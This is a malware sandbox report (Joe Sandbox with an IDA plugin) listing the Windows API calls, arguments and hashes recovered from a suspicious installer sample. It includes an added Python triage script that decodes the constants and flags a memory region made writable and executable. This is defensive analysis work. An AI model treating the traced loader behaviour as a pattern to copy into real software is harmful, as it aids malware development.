                                                                                                            • Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
                                                                                                            • Opcode Fuzzy Hash: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                                            • Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(008F9040), ref: 00401B92
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3394109436-1824292864
                                                                                                            • Opcode ID: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                            • Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
                                                                                                            • Opcode Fuzzy Hash: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                            • Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnumErrorLastWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 14984897-0
                                                                                                            • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                            • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                                            • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                            • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                                            APIs
                                                                                                              • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                            • Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
                                                                                                            • Opcode Fuzzy Hash: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                            • Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                            • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                                                            • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                            • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                            • Instruction ID: 4da21f5269aa326e6de85e385cb401583d451f1930efd1289825586750b78c36
                                                                                                            • Opcode Fuzzy Hash: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                            • Instruction Fuzzy Hash: 84E08CB2B04104DBDB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C008E3E
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405B5A
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                            • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                            • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                            • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                            • Instruction ID: 7b0a8f507568a188bd2c0a80d79ed85a493e53c174130335dce059ea839ee6d0
                                                                                                            • Opcode Fuzzy Hash: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                            • Instruction Fuzzy Hash: 13E01AB1B15114ABDB01ABE59D49CEEB66DEB00319F20043BF101B00D1C27989019E7E
                                                                                                            APIs
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 390214022-0
                                                                                                            • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                            • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                            • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                            • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                            APIs
                                                                                                            • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PathSearch
                                                                                                            • String ID:
                                                                                                            • API String ID: 2203818243-0
                                                                                                            • Opcode ID: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                            • Instruction ID: f28d117729d6db308ba67ea043928a1e47cb3974c8f3bd2f87491376c6cbdc89
                                                                                                            • Opcode Fuzzy Hash: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                            • Instruction Fuzzy Hash: 73E048B2314200AAD710DFA5DE48EEA776CDB0036CF304676E611A61D0D2B45A41D72D
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                            • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                                            • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                            • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                            • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                                                            • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                            • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                            • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                                            • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                            • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
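The records above list, for each recovered function, the imported API it calls together with the raw hexadecimal stack arguments and the call-site address. Reading them as a triager means decoding those constants: in the VirtualProtect record the third argument 0x40 is PAGE_EXECUTE_READWRITE, applied to 4 bytes at 0x1000405C inside the 10000000 module, and in the GlobalAlloc record further down the first argument 0x40 is GMEM_ZEROINIT. The following Python is an added example, not part of the Joe Sandbox report or of its IDA plugin output. It parses lines in the report's own "• Api.MODULE(args), ref: ADDR" layout (the input strings are copied from the APIs entries in this section, with "?" kept for arguments the sandbox could not resolve), decodes the winnt.h protection and GlobalAlloc flag constants, and flags any protection change that leaves memory both writable and executable. The API_LINE pattern, the ApiCall class and the wording of the findings are this example's own choices.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox report and decode
the constants that decide whether a call is benign or worth a closer look."""
import re
from dataclasses import dataclass
from typing import Optional

# Input copied verbatim from the APIs entries of this report section;
# '?' marks an argument the sandbox could not resolve.
REPORT_API_LINES = [
    "• WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A",
    "• SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C",
    "• VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB",
    "• GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225",
]

# Example's own pattern for the report's "• Api.MODULE(args), ref: ADDR" layout.
API_LINE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Memory-protection constants from winnt.h.
PAGE_BASE = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE = 0x04 | 0x08 | 0x40 | 0x80

# GlobalAlloc uFlags from winbase.h; GMEM_FIXED is 0 and therefore implied.
GMEM_FLAGS = {0x0002: "GMEM_MOVEABLE", 0x0040: "GMEM_ZEROINIT"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list  # int for resolved values, None for '?'
    ref: int    # address of the call site inside the dumped image


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for one report line, or None if the line is not an API entry."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [None if a == "?" else int(a, 16) for a in m["args"].split(",") if a]
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def parse_report(lines) -> list:
    return [c for c in (parse_api_line(l) for l in lines) if c is not None]


def decode_protection(value: int) -> str:
    """Render a flNewProtect value as winnt.h names, e.g. 0x104 -> PAGE_READWRITE|PAGE_GUARD."""
    names = [PAGE_BASE.get(value & 0xFF, f"0x{value & 0xFF:x}")]
    names += [n for bit, n in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(names)


def decode_gmem_flags(value: int) -> str:
    names = [n for bit, n in GMEM_FLAGS.items() if value & bit]
    return "|".join(names) if names else "GMEM_FIXED"


def assess(call: ApiCall) -> list:
    """Findings a triager wants: protection changes (RWX flagged) and decoded allocation flags."""
    findings = []
    a = call.args
    if call.api == "VirtualProtect" and len(a) >= 3 and a[2] is not None:
        prot = decode_protection(a[2])
        addr = f"0x{a[0]:08X}" if a[0] is not None else "?"
        size = a[1] if a[1] is not None else "?"
        if a[2] & EXECUTABLE and a[2] & WRITABLE:
            findings.append(f"RWX: VirtualProtect({addr}, {size} bytes) -> {prot} at ref 0x{call.ref:08X}")
        else:
            findings.append(f"VirtualProtect({addr}, {size} bytes) -> {prot}")
    elif call.api == "GlobalAlloc" and a and a[0] is not None:
        # The listing shows more stack slots than GlobalAlloc's two parameters;
        # only uFlags (the first slot) is interpreted here.
        findings.append(f"GlobalAlloc flags {decode_gmem_flags(a[0])}")
    return findings


def assess_report(lines) -> list:
    return [f for call in parse_report(lines) for f in assess(call)]


if __name__ == "__main__":
    for finding in assess_report(REPORT_API_LINES):
        print(finding)
```

The argument list in these records can be longer than the API's parameter count (the GlobalAlloc entry shows ten values for a two-parameter function), so the decoder interprets only the leading positions that correspond to documented parameters and leaves the rest untouched. Run against the four lines above it reports the 0x1000405C protection change as RWX and the GlobalAlloc call as GMEM_ZEROINIT; the two file and path calls produce no finding.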
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                            • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                                                            • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                            • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                            • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                            • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                            • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761449716-0
                                                                                                            • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                            • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                            • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                            • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405332
• GetDlgItem.USER32(?,000003EE), ref: 00405341
• GetClientRect.USER32(?,?), ref: 0040537E
• GetSystemMetrics.USER32(00000015), ref: 00405386
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
• ShowWindow.USER32(?,00000008), ref: 00405422
